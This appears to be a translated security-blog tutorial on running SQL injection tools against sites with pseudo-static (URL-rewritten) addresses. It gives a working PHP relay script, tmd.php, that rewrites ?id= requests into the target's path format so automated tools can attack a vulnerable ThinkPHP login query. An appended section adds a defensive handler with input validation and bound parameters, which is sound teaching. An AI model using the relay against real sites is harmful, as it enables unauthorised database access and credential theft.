Injecting pseudo-static websites
This is a primer on the injection method for pseudo-static websites. Generally, the URL of a dynamic script page looks like this:
http://www.91ri.org/news.php?id=111
After pseudo-static rewriting it looks like this:
http://www.91ri.org/news.php/id/111.html
Slashes "/" replace the "?" and "=" of the query string, and .html is appended at the end. As a result, tools cannot be used directly for injection. Now we will discuss how to use tools for injection anyway. Anyone familiar with cookie injection will recognize the approach; the principle is similar. We write a dynamic web page script, construct our own URL rule, and access the target page through this page!
That is, we convert the pseudo-static URL rule back to the original ?id=123 form, giving an ordinary URL that tools can inject easily.
Okay, try it out! I set up a simple injection point locally using ThinkPHP, because ThinkPHP comes with simple pseudo-static support, which is convenient for demonstration.
The SQL statement for this injection point is as follows; the id is received from GET:
SELECT account AS username, password FROM think_user WHERE id = 1
The page URL is as follows:
http://www.91ri.org/index.php/index/index/id/111.html
The value 111 is the part to change in order to inject!
I am familiar with PHP, so I use PHP to write the injection relay (transit) page.
Source code of the tmd.php relay page:
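<?php
set_time_limit(0);
// Read the id from the ordinary query string (?id=...).
$id = $_GET["id"];
// Encode spaces and "=" so the value survives as a single path segment.
$id = str_replace(" ", "%20", $id);
$id = str_replace("=", "%3D", $id);
// Rebuild the URL according to the target's pseudo-static rule.
//$url = "http://www.91ri.org/test/id-$id.html";
$url = "http://www.91ri.org/inj/index.php/index/index/id/$id.html";
//echo $url;
// Fetch the target page with curl and return its body unchanged.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);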
Save this file as tmd.php. The URL of this file is as follows:
http://www.91ri.org/inj/tmd.php
The $id received for injection is placed at the position that the target page's pseudo-static rule specifies, as shown above.
The principle is to use curl to obtain the content of the target page (similar to accessing the target page directly). You only need to modify the content of $url to adapt to various pseudo-static rules.
The script is relatively simple. Readers who need them can add POST, proxy, referer, and other functions.
Visiting http://www.91ri.org/inj/tmd.php?id=111 now
is equivalent to accessing http://www.91ri.org/inj/index.php/index/index/id/111.html.
Now we can give the link http://www.91ri.org/inj/tmd.php?id=111 to the injection tool.
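The relay works only because the id path segment still reaches the SQL statement unchanged; rewriting the URL filters nothing. As an added example (not code from the original article), here is a handler for the same route that validates the segment and binds it as a parameter. The function names, the in-memory SQLite database and the sample paths are constructed for illustration.

```php
<?php
// Added example: hardened handler for the pseudo-static route discussed above.
// Table and column names follow the article's query; everything else is assumed.

// Extract the id from a path such as /index/index/id/111.html.
function idFromPath(string $pathInfo): ?int
{
    // Accept only /id/<1-9 digits>.html at the end of the path; reject the rest.
    if (!preg_match('#/id/([0-9]{1,9})\.html$#D', $pathInfo, $m)) {
        return null;
    }
    return (int) $m[1];
}

function findUser(PDO $db, int $id): ?array
{
    // The value is bound as an integer, never concatenated into the SQL text.
    $stmt = $db->prepare(
        'SELECT account AS username, password FROM think_user WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE think_user (id INTEGER PRIMARY KEY, account TEXT, password TEXT)');
$db->exec("INSERT INTO think_user VALUES (111, 'demo', 'placeholder-hash')");

// Constructed request paths: a valid id, an unknown id, and a non-numeric
// segment encoded the way the relay page encodes spaces and "=".
$paths = [
    '/index/index/id/111.html',
    '/index/index/id/222.html',
    '/index/index/id/111%20or%201%3D1.html',
];
foreach ($paths as $p) {
    // A web server normally hands PATH_INFO over already decoded.
    $id = idFromPath(rawurldecode($p));
    if ($id === null) {
        echo "$p -> 400 rejected\n";
        continue;
    }
    $user = findUser($db, $id);
    echo "$p -> " . ($user ? $user['username'] : 'not found') . "\n";
}
```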